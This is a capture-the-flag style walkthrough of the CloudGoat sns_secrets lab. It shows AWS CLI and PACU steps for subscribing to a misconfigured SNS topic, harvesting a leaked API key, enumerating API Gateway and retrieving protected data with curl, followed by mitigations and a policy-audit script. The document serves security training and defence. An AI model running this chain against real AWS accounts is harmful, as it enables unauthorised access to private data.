This walkthrough covers the CloudGoat scenario sns_secrets: a misconfigured SNS topic leaks an API Gateway key, which then unlocks a protected endpoint that returns sensitive data.
I approached it in two ways:
- Manual enumeration with AWS CLI (best visibility into each step).
- Automation with PACU (faster path once credentials are loaded).
Lab safety: Commands and output below use redacted placeholders. Never publish real AWS keys, tokens, API keys, or personal emails from live environments.
What is Amazon SNS?
Amazon SNS (Simple Notification Service) is a pub/sub messaging service. A publisher sends to a topic, then SNS fans out messages to subscribers (email, HTTPS, Lambda, SQS, and more).
In this scenario, the issue is not SNS itself; the issue is policy configuration. If a topic allows broad or public subscription, sensitive notifications can leak to unauthorized recipients.
What is API Gateway?
Amazon API Gateway is an entry point for APIs. It can enforce authentication, API keys, usage plans, and route traffic to backends such as Lambda, EC2, or mock integrations.
If API keys are exposed and endpoint discovery is easy, attackers can enumerate stages and resources, then pull sensitive responses from otherwise protected routes.
Detailed steps
Initial access
Start with low-privileged IAM credentials from the scenario output (values below are placeholders):
sns_user_access_key_id = AKIA****************
sns_user_secret_access_key = ********************************
Configure these in a named profile:
aws configure --profile sns-user
Validate identity:
aws sts get-caller-identity --profile sns-user
Enumerate SNS topics
aws sns list-topics --profile sns-user
Identify the target topic ARN, then inspect policy and attributes:
aws sns get-topic-attributes \
--topic-arn arn:aws:sns:us-east-1:<ACCOUNT_ID>:public-topic-<suffix> \
--profile sns-user
In this lab, policy permissions on the topic allow unsafe subscription behavior.
Subscribe and receive leaked key material
Subscribe an email endpoint:
aws sns subscribe \
--topic-arn arn:aws:sns:us-east-1:<ACCOUNT_ID>:public-topic-<suffix> \
--protocol email \
--notification-endpoint you@example.com \
--profile sns-user
After confirmation, SNS notifications expose an API key in debug-like output.
Enumerate API Gateway
List APIs:
aws apigateway get-rest-apis --profile sns-user
Find stage name:
aws apigateway get-stages \
--rest-api-id <REST_API_ID> \
--profile sns-user
Find resource paths and method details:
aws apigateway get-resources \
--rest-api-id <REST_API_ID> \
--embed methods \
--profile sns-user
This reveals a path like /user-data whose method has the API key requirement enabled (apiKeyRequired is true in the embedded method details).
Access the endpoint with the leaked API key
Build the full execute-api URL and include the key header:
curl -s \
-H "x-api-key: <LEAKED_API_KEY>" \
"https://<REST_API_ID>.execute-api.us-east-1.amazonaws.com/<STAGE_NAME>/user-data"
In this scenario, the response contains a flag and hardcoded user details.
PACU path (faster enumeration)
Using the same low-privileged key pair:
- Import credentials into PACU.
- Run sns__enum to discover topics.
- Run sns__subscribe to register your email endpoint.
- Retrieve leaked key material.
- Return to AWS CLI for API Gateway enumeration and endpoint access.
PACU speeds up discovery, but CLI output is still useful for understanding exactly what is exposed and why.
Mitigations (defender view)
- Restrict SNS topic policies: avoid wildcard principals for subscribe/receive actions.
- Classify and sanitize notifications: never include secrets, keys, or debug payloads in message content.
- Harden API Gateway exposure: use auth beyond API keys where possible, and minimize discoverable metadata.
- Review IAM permissions: reduce unnecessary read/enumeration actions for low-privilege identities.
- Detect abnormal subscriptions: monitor unexpected SNS subscriptions and alert on policy drift.
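To make the first mitigation concrete, here is an added example (not part of the original walkthrough or CloudGoat) that audits a topic policy, such as the Policy attribute returned by get-topic-attributes above, and flags Allow statements that grant sns:Subscribe or sns:Receive to a wildcard principal with no Condition. The sample policy and account id are constructed for illustration.

```python
import json
from fnmatch import fnmatch

# Actions that let an outside party attach a subscription or read messages.
RISKY_ACTIONS = ("sns:Subscribe", "sns:Receive")

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _principal_is_wildcard(principal):
    # Principal may be "*" or {"AWS": "*"} / {"AWS": ["*", ...]}.
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any("*" in _as_list(v) for v in principal.values())
    return False

def _action_matches(pattern, action):
    # IAM action names are case-insensitive and may be globs ("sns:*", "*").
    return fnmatch(action.lower(), pattern.lower())

def find_public_subscribe_statements(policy_document):
    """Return Sids of Allow statements that let anyone subscribe/receive
    without a Condition (the policy shape behind the sns_secrets leak)."""
    policy = json.loads(policy_document) if isinstance(policy_document, str) else policy_document
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not _principal_is_wildcard(stmt.get("Principal")):
            continue
        if stmt.get("Condition"):
            continue  # scoped by a condition (e.g. aws:PrincipalOrgID); review separately
        patterns = _as_list(stmt.get("Action", []))
        if any(_action_matches(p, a) for p in patterns for a in RISKY_ACTIONS):
            findings.append(stmt.get("Sid", "<no Sid>"))
    return findings

# Constructed sample policy (not taken from the lab): one public statement,
# one owner-only Publish statement, one wildcard principal scoped by Condition.
TOPIC_ARN = "arn:aws:sns:us-east-1:111122223333:public-topic-example"
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "AllowAnyoneToSubscribe", "Effect": "Allow", "Principal": "*",
         "Action": ["sns:Subscribe", "sns:Receive"], "Resource": TOPIC_ARN},
        {"Sid": "OwnerPublish", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::111122223333:root"},
         "Action": "sns:Publish", "Resource": TOPIC_ARN},
        {"Sid": "SameOrgOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": "SNS:Subscribe", "Resource": TOPIC_ARN,
         "Condition": {"StringEquals": {"aws:PrincipalOrgID": "o-exampleorg"}}},
    ],
}

if __name__ == "__main__":
    print(find_public_subscribe_statements(SAMPLE_POLICY))  # ['AllowAnyoneToSubscribe']
```

Feed it the Policy string from the CLI output to check a real topic; a non-empty result is the configuration this scenario abuses.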
References
- CloudGoat
- Amazon SNS Documentation
- Amazon API Gateway Documentation